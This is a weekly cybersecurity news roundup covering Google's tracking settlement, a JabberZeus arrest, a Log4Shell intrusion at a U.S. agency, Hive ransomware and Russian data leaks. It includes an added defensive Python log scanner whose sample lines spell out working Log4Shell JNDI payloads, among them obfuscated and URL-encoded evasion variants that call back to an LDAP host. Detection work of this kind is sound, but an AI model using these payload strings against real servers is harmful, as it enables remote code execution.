
Google to pay $391.5 million for user-tracking; arrest of the suspected Zeus leader and other cybersecurity news

We round up the week’s most significant cybersecurity news.

  • Google will pay $391.5 million for unlawful user tracking.
  • In Switzerland, authorities arrested a suspected leader of the Zeus group.
  • A U.S. federal agency was hit with a crypto miner.
  • 96% of Russian companies were vulnerable to cyberattacks.

Google to pay $391.5 million for unlawful user tracking

Google will pay $391.5 million to settle a case brought by 40 U.S. state attorneys general over unlawful collection of location data, the Associated Press reports.

The investigation found that even when users had turned location tracking off, Google services still recorded their whereabouts through other account settings. Residents of 40 states were among those affected.

Location data is valuable to tech firms chiefly because it helps them sell advertising to marketers. Google's advertising business, which relies on such data, brings in more than $200 billion a year, AP estimates.

Police have also used Google location data to identify suspects.

The geolocation tracking issue affected nearly 2 billion Android users and hundreds of millions of iPhone owners worldwide.

In Switzerland, the suspected Zeus group leader was arrested

Geneva police, acting at the request of the FBI, arrested Ukrainian citizen Vyacheslav Penchukov, described as one of the leaders of the JabberZeus cybercrime group. Bleeping Computer reports, citing the Swiss Federal Office of Justice.

Source: FBI.

The 40-year-old Penchukov, also known as Tank, was arrested on 23 October. He faces charges of extortion, bank fraud and theft of personal data via the Zeus trojan. He has been sought since 2012.

According to the publication, Penchukov was among suspects arrested by Ukrainian police in January 2021 during an operation against the Egregor ransomware gang. He, however, avoided prosecution at the time thanks to political connections.

Two of his JabberZeus associates, Ukrainian nationals Yevhen Kulibaba and Yuriy Konovalenko, pleaded guilty in November 2014 after extradition from the United Kingdom. In May 2015 they were sentenced to two years and ten months in prison.

Penchukov is awaiting extradition to the United States, though he may appeal the decision.

96% of Russian companies were vulnerable to cyberattacks

The IT infrastructure of almost all large Russian companies can be penetrated from the internal network, according to a Positive Technologies report.

From late 2021 to mid-2022, specialists conducted analysis of 53 projects across 30 organisations. In testing, they achieved full control over the infrastructure in 96% of the companies studied. On average, an attacker could breach the internal network in five days and four hours.

In 90% of cases, the hacker could potentially access confidential information, including trade secrets.

In 85% of organisations, dangerous vulnerabilities linked to weak password policies were identified. Another 60% of firms used outdated software versions.

U.S. agency attacked with a crypto miner

An unnamed hacking group, believed to be backed by Iran, breached the network of a U.S. Federal Civilian Executive Branch (FCEB) organisation and deployed the XMRig crypto miner, according to CISA.

The attackers exploited the Log4Shell vulnerability (CVE-2021-44228) in an unpatched VMware Horizon server to gain remote code execution.

Source: CISA.

After deploying the miner, the attackers installed reverse proxy servers in the compromised systems to maintain their presence in the FCEB’s internal network.

CISA urged all organisations that had not patched their VMware systems against Log4Shell to assume compromise and hunt for malicious activity on their networks.
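The hunt CISA recommends starts with finding Log4Shell lookup strings in request logs. The script below is an added example, not code from CISA or from the page: it scans constructed Apache-style log lines (the hosts, paths and timestamps are made up) for `${jndi:` probes, including the common evasions seen in the wild (URL encoding and nested `${lower:}`, `${upper:}` and `${x:-y}` default-value lookups) that defeat a naive string match.

```python
"""Hunt for Log4Shell (CVE-2021-44228) lookup strings in web/application logs.

Added example; the sample log lines are constructed, not taken from CISA's
advisory or any real incident.
"""
import re
import urllib.parse

# Un-obfuscated lookup prefix, e.g. "${jndi:ldap://..." (any case).
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Innermost lookups (no nested "${" inside) that attackers use to hide "jndi":
#   ${lower:J} -> j,  ${upper:n} -> N,  ${env:NOPE:-j} / ${::-j} -> j (default value)
TRANSFORMS = [
    (re.compile(r"\$\{\s*lower\s*:([^${}]*)\}", re.IGNORECASE), lambda m: m.group(1).lower()),
    (re.compile(r"\$\{\s*upper\s*:([^${}]*)\}", re.IGNORECASE), lambda m: m.group(1).upper()),
    (re.compile(r"\$\{[^${}]*?:-([^${}]*)\}"), lambda m: m.group(1)),
]


def _step(text):
    """Apply one round of de-obfuscation. Returns (new_text, hit).

    JNDI_RE is checked before every rewrite so a payload such as
    "${jndi:ldap://h/a:-b}" is flagged before the default-value rule could
    collapse it into "b".
    """
    for pattern, repl in TRANSFORMS:
        if JNDI_RE.search(text):
            return text, True
        text = pattern.sub(repl, text)
    text = urllib.parse.unquote(text)  # one layer of %XX encoding per round
    return text, bool(JNDI_RE.search(text))


def deobfuscate(line, max_rounds=20):
    """Return (decoded_line, is_probe) for a single log line."""
    text = line
    for _ in range(max_rounds):
        new, hit = _step(text)
        if hit:
            return new, True
        if new == text:  # nothing left to unwrap
            return new, False
        text = new
    # Still changing after max_rounds: that depth of nesting is itself suspicious.
    return text, True


def is_log4shell_probe(line):
    return deobfuscate(line)[1]


def scan(lines):
    """Return 1-based indices of lines that carry a Log4Shell probe."""
    return [n for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]


# Constructed sample access log: one benign request, three probe variants
# (plain, nested-lookup obfuscated, URL-encoded), one benign lookup string.
SAMPLE_LOGS = [
    '10.0.0.7 - - [14/Nov/2022:10:01:02 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [14/Nov/2022:10:01:15 +0000] "GET /portal/ HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '198.51.100.23 - - [14/Nov/2022:10:01:16 +0000] "GET /portal/ HTTP/1.1" 200 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.23:1389/b}"',
    '198.51.100.23 - - [14/Nov/2022:10:01:17 +0000] "GET /?q=%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.23%3A1389%2Fc%7D HTTP/1.1" 404 "-" "curl/7.85"',
    '10.0.0.9 - - [14/Nov/2022:10:02:00 +0000] "GET /broker/xml HTTP/1.1" 200 "-" "Mozilla/5.0 ${env:HOME:-/home/user}"',
]

if __name__ == "__main__":
    for n in scan(SAMPLE_LOGS):
        decoded, _ = deobfuscate(SAMPLE_LOGS[n - 1])
        print(f"line {n}: {decoded}")
```

Run it against real access, application and Horizon logs by replacing `SAMPLE_LOGS` with the file's lines; the decoded output exposes the attacker's LDAP/RMI callback host, which is the pivot for the rest of the hunt (outbound connections to that host, new Java child processes, unexpected `xmrig` binaries).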

Researchers from Kaspersky Lab noted that in Q3 2022 the number of new miner variants rose sharply, as did the number of affected users. The company's solutions detected more than 150,000 new miner variants, compared with 50,000 in the same period of 2021.

Experts noted that the cryptojacking landscape has expanded, with more capable miner variants appearing.

FBI estimates Hive earnings after breaches of more than 1,300 companies

Since June 2021 the Hive ransomware group has breached over 1,300 companies and extorted about $100 million from victims, according to the FBI’s report.

According to the agency, victims include government agencies, telecommunications and IT firms; healthcare organisations, however, are targeted most often.

Source: FBI.

Hive operators frequently deploy additional payloads from other ransomware operators in their victims’ networks if victims refuse to pay.

Since early 2022 victims have sent analysts more than 850 malware samples. Many arrived after a spike in ransomware activity—from late March to mid-April.

Data of 4 million Dom.ru customers goes public

Hackers posted the customer database of the Saint Petersburg-based provider Dom.ru online. Telegram channel “Information Leaks” reports.

The database dates to November 2021. Two tables contain full names, dates of birth, phone numbers, customer comments, parts of the connection address and other details.

Source: Telegram channel "Information Leaks".

The channel suggests that the attacker had access not to the operator's customer database itself but to the log of incoming connection requests.

SecurityLab notes that the leak affected 4 million users in total.

Dom.ru representatives told Roskomsvoboda that they are investigating the incident. Roskomnadzor says it did not receive a notification from the provider about the leak.

Separately, unknown hackers put user data from the Russian ride-hailing service Whoosh up for sale on the dark web. The dump was priced at $4,200.

Source: Telegram channel "Information Leaks".

News of the breach emerged last week. It was attributed to a security lapse by a former employee of the company, through whom attackers gained access to "some of the primary data of several million customers," namely:

Whoosh representatives confirmed the incident, stressing that only “non-sensitive data” were affected.

What to read this weekend?

One of the means of fighting surveillance and censorship online is the Tor web browser. We explain how it works and how to use it—across educational cards.
